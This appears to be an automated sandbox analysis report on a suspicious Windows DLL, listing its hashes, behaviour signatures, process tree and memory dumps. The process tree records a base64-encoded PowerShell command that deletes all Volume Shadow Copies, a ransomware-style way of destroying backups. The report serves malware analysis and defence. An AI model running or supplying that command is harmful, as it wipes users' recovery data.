Analysis

  • max time kernel
    122s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:40

General

  • Target

    fa52e9a0f3ea72b98d34fd2ebb6f6cf57944e3e5e535add59213f0fc2cb612b9.dll

  • Size

    164KB

  • MD5

    2fa5c892e8c030dc128a2c94e67a69e3

  • SHA1

    8fc5d2fc29fc1a7d0824bbf300f98b26741e7156

  • SHA256

    fa52e9a0f3ea72b98d34fd2ebb6f6cf57944e3e5e535add59213f0fc2cb612b9

  • SHA512

    70b2287921c7bf5f024c5ec01c0ea2e9464f31241e186b85fed74bf8c67ec7a50738b2e1ab7b019b8b7433e09ed3a071420a86e29294aa0dae30ffd16406b3bb

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\fa52e9a0f3ea72b98d34fd2ebb6f6cf57944e3e5e535add59213f0fc2cb612b9.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1140
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\fa52e9a0f3ea72b98d34fd2ebb6f6cf57944e3e5e535add59213f0fc2cb612b9.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2004
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:376
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:596
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1120

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/376-56-0x000007FEFC151000-0x000007FEFC153000-memory.dmp
      Filesize

      8KB

    • memory/376-57-0x0000000002850000-0x0000000002852000-memory.dmp
      Filesize

      8KB

    • memory/376-59-0x0000000002852000-0x0000000002854000-memory.dmp
      Filesize

      8KB

    • memory/376-60-0x0000000002854000-0x0000000002857000-memory.dmp
      Filesize

      12KB

    • memory/376-58-0x000007FEF3360000-0x000007FEF3EBD000-memory.dmp
      Filesize

      11.4MB

    • memory/376-61-0x000000000285B000-0x000000000287A000-memory.dmp
      Filesize

      124KB

    • memory/2004-55-0x0000000076511000-0x0000000076513000-memory.dmp
      Filesize

      8KB